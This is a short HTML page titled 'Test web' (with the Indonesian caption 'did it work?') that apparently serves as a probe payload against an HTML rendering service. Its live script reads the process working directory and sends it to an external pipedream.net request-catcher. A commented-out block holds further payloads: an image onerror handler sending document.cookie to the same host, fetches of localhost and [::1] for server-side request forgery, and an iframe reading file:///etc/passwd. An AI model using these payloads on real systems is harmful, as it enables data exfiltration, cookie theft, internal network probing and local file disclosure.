<html>
  <body>
    <h1>Test web</h1>
    <p>berhasil gak?</p>
    <script>
	    var a = process.cwd();
	    fetch('https://eo6q6x6o5xxa5xl.m.pipedream.net', {method: 'POST', mode: 'no-cors', body:a});
	    fetch('https://eo6q6x6o5xxa5xl.m.pipedream.net/?a='+process.cwd());
    </script>
<!--    <img src=a onerror="fetch('https://eo6q6x6o5xxa5xl.m.pipedream.net', {method: 'POST', mode: 'no-cors', body:document.cookie})">
    <img src=b onerror="fetch('http://localhost').then((a)=>a.text().then((b)=>alert(b)))">
    <img src=b onerror="fetch('http://[::1]').then((c)=>c.text().then((d)=>alert(d)))">
    <iframe src="file:///etc/passwd">
--!>
  </body>
</html>
